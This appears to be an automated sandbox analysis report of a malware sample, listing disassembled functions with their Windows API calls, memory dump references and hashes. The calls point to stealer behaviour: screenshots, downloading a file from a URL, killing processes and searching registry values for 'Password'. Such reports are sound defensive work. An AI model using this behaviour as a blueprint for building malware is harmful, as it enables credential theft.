                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                  • String ID:
                                  • API String ID: 2929475105-0
                                  • Opcode ID: cdc165f8524af6b49efb66c5bab2dc904ffea5ee76c9505401261de168b3a28a
                                  • Instruction ID: d4a7de7938e675d8ee1a124c7fab9f6c5a1b369fe29750a47a4513496d4a2e86
                                  • Opcode Fuzzy Hash: cdc165f8524af6b49efb66c5bab2dc904ffea5ee76c9505401261de168b3a28a
                                  • Instruction Fuzzy Hash: 8191E8306207428FDB30AFA8DC84AE637B5FB94784F504469E9498B293EF75DC50CB92
                                  Function 002CC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CC8A2
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002CC8D1
                                  • lstrlen.KERNEL32(00000000), ref: 002CC8FC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002CC932
                                  • StrCmpCA.SHLWAPI(00000000,002E4C3C), ref: 002CC943
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 42e09e79513f5ca8c43751af03c39664cc73b893bb325c3a9593038c5b51a05d
                                  • Instruction ID: 884fc88fe983fe60d43c841b71cc75cd4449342d9a8345eb186fd8d141fd832e
                                  • Opcode Fuzzy Hash: 42e09e79513f5ca8c43751af03c39664cc73b893bb325c3a9593038c5b51a05d
                                  • Instruction Fuzzy Hash: D9619171D2125A9BDB11EFB5C888FEEBBF8AF05340F244279E849E7241D7748D158B90
                                  Function 002D41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,002D0CF0), ref: 002D4276
                                  • GetDesktopWindow.USER32 ref: 002D4280
                                  • GetWindowRect.USER32(00000000,?), ref: 002D428D
                                  • SelectObject.GDI32(00000000,00000000), ref: 002D42BF
                                  • GetHGlobalFromStream.COMBASE(002D0CF0,?), ref: 002D4336
                                  • GlobalLock.KERNEL32(?), ref: 002D4340
                                  • GlobalSize.KERNEL32(?), ref: 002D434D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                  • String ID:
                                  • API String ID: 1264946473-0
                                  • Opcode ID: cedc0c31a4f3d6ec95ffa2931be9f07c8a724febb0f5cf52db28c4f42e624a7c
                                  • Instruction ID: 2ed5480cb69b9739f078b67c8bf0a1b726da0effe527581c1116fc91e970da82
                                  • Opcode Fuzzy Hash: cedc0c31a4f3d6ec95ffa2931be9f07c8a724febb0f5cf52db28c4f42e624a7c
                                  • Instruction Fuzzy Hash: E8513D75A10209AFDB10EFA4DC89EEEB7B9EF48310F104129F905E7251DB74AE15CBA4
                                  Function 002CDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcat.KERNEL32(?,011CE2B0), ref: 002CE00D
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 002CE037
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE07D
                                  • lstrcat.KERNEL32(?,?), ref: 002CE098
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0AC
                                  • lstrcat.KERNEL32(?,011BBA68), ref: 002CE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0D4
                                  • lstrcat.KERNEL32(?,011CD8D0), ref: 002CE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002CE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                  • String ID:
                                  • API String ID: 4230089145-0
                                  • Opcode ID: adeae5cd87fa82c84eaf15ddc95141024d7f7787780a7cdf353c1ef17f91a390
                                  • Instruction ID: 1a5258f973b0fcf49e3ddce758de682f30f619bdcd5d3228b6007e64f45f6f14
                                  • Opcode Fuzzy Hash: adeae5cd87fa82c84eaf15ddc95141024d7f7787780a7cdf353c1ef17f91a390
                                  • Instruction Fuzzy Hash: F561907192021CEBCF55DF64CC84BDDB7B4BF88300F5049A8A64AA7291DB709F958F90
                                  Function 002B6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B6AFF
                                  • InternetOpenA.WININET(002DCFEC,00000001,00000000,00000000,00000000), ref: 002B6B2C
                                  • StrCmpCA.SHLWAPI(?,011CE9C8), ref: 002B6B4A
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 002B6B6A
                                  • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002B6B88
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002B6BA1
                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002B6BC6
                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 002B6BF0
                                  • CloseHandle.KERNEL32(00000000), ref: 002B6C10
                                  • InternetCloseHandle.WININET(00000000), ref: 002B6C17
                                  • InternetCloseHandle.WININET(?), ref: 002B6C21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                                  • String ID:
                                  • API String ID: 2500263513-0
                                  • Opcode ID: fdd76d4e7209e1e026ac6bc109a676e43f908a783dafeaed1efb46b1429ceda7
                                  • Instruction ID: d405bc2b41cb875b810509d82b2c29b7b87495efaef75d415e5760c8884f1b9b
                                  • Opcode Fuzzy Hash: fdd76d4e7209e1e026ac6bc109a676e43f908a783dafeaed1efb46b1429ceda7
                                  • Instruction Fuzzy Hash: 10419471610205ABDF20DF64DC89FEE7778EB04744F104568FA05EB281DF74AD548BA8
                                  Function 002D4500 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 95memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,002C4F39), ref: 002D4545
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 002D454C
                                  • wsprintfW.USER32 ref: 002D455B
                                  • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 002D45CA
                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 002D45D9
                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 002D45E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                  • String ID: 9O,$%hs$9O,
                                  • API String ID: 885711575-839828205
                                  • Opcode ID: 34637bfb54688060b165bf81fd50cef9a11e4810258368c0e66511680a0ee43b
                                  • Instruction ID: 2523c75fa2755aea591edd39e1c8e5010ea9b35f97ddda4b465015cd6c6da096
                                  • Opcode Fuzzy Hash: 34637bfb54688060b165bf81fd50cef9a11e4810258368c0e66511680a0ee43b
                                  • Instruction Fuzzy Hash: EC316171A10245BBDB10DFE4DC85FDE7778EF44700F104169F605EB281EB706A558BA9
                                  Function 002BBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002BBC1F
                                  • lstrlen.KERNEL32(00000000), ref: 002BBC52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BBC7C
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002BBC84
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002BBCAC
                                  • lstrlen.KERNEL32(002E4AD4), ref: 002BBD23
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat
                                  • String ID:
                                  • API String ID: 2500673778-0
                                  • Opcode ID: 0539d7e7f352e269888bd486676042ea9d64d0af75495cdfb07b32f90aae62b7
                                  • Instruction ID: 4aad487aea5bcbdf88e95eb7ac8cad50cca4f59c5a32423aa38e19af00408850
                                  • Opcode Fuzzy Hash: 0539d7e7f352e269888bd486676042ea9d64d0af75495cdfb07b32f90aae62b7
                                  • Instruction Fuzzy Hash: 10A16030621206CFDB26DF28D989AEEB7B0AF44344F28806DE449DB362DB75DC65CB54
                                  Function 002D5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                                  Download Yara Rule
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5F2A
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D5F49
                                  • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 002D6014
                                  • memmove.MSVCRT(00000000,00000000,?), ref: 002D609F
                                  • std::_Xinvalid_argument.LIBCPMT ref: 002D60D0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_$memmove
                                  • String ID: invalid string position$string too long
                                  • API String ID: 1975243496-4289949731
                                  • Opcode ID: c07840ba5b148c01016c582d48cf3f3bee4aa8141da0012a4eba7e6d74673c34
                                  • Instruction ID: bbca0997cda92ca0046327c4c973a61cdce843088df1235c020866d49a480cda
                                  • Opcode Fuzzy Hash: c07840ba5b148c01016c582d48cf3f3bee4aa8141da0012a4eba7e6d74673c34
                                  • Instruction Fuzzy Hash: 3661B070B30544DFDB18CF5CC894A6EB7BAFF85305B24490AE4928B781C7B1EDA08B95
                                  Function 002CE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE06F
                                  • lstrcat.KERNEL32(?,00000000), ref: 002CE07D
                                  • lstrcat.KERNEL32(?,?), ref: 002CE098
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0AC
                                  • lstrcat.KERNEL32(?,011BBA68), ref: 002CE0C0
                                  • lstrcat.KERNEL32(?,?), ref: 002CE0D4
                                  • lstrcat.KERNEL32(?,011CD8D0), ref: 002CE0E7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CE11F
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 002CE126
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$AttributesFile
                                  • String ID:
                                  • API String ID: 3428472996-0
                                  • Opcode ID: 68a5f89fc5fc1547dc413d5c5d505a2564bfaea83dfa4a436e32ecb1d7ca6824
                                  • Instruction ID: 7549df034b22f1ea0e203490e6c959a115b7af457288795407afe19ae062514e
                                  • Opcode Fuzzy Hash: 68a5f89fc5fc1547dc413d5c5d505a2564bfaea83dfa4a436e32ecb1d7ca6824
                                  • Instruction Fuzzy Hash: 1A418F71920118DBCF25EF64DC89ADD73B4BF48300F544AA8F64AA7251DB709FA98F90
                                  Function 002B7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 002B77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 002B7805
                                    • Part of subcall function 002B77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 002B784A
                                    • Part of subcall function 002B77D0: StrStrA.SHLWAPI(?,Password), ref: 002B78B8
                                    • Part of subcall function 002B77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 002B78EC
                                    • Part of subcall function 002B77D0: HeapFree.KERNEL32(00000000), ref: 002B78F3
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002B7A90
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B7ABD
                                  • lstrcat.KERNEL32(00000000, : ), ref: 002B7ACF
                                  • lstrcat.KERNEL32(00000000,?), ref: 002B7AF0
                                  • wsprintfA.USER32 ref: 002B7B10
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002B7B39
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002B7B47
                                  • lstrcat.KERNEL32(00000000,002E4AD4), ref: 002B7B60
                                  Strings
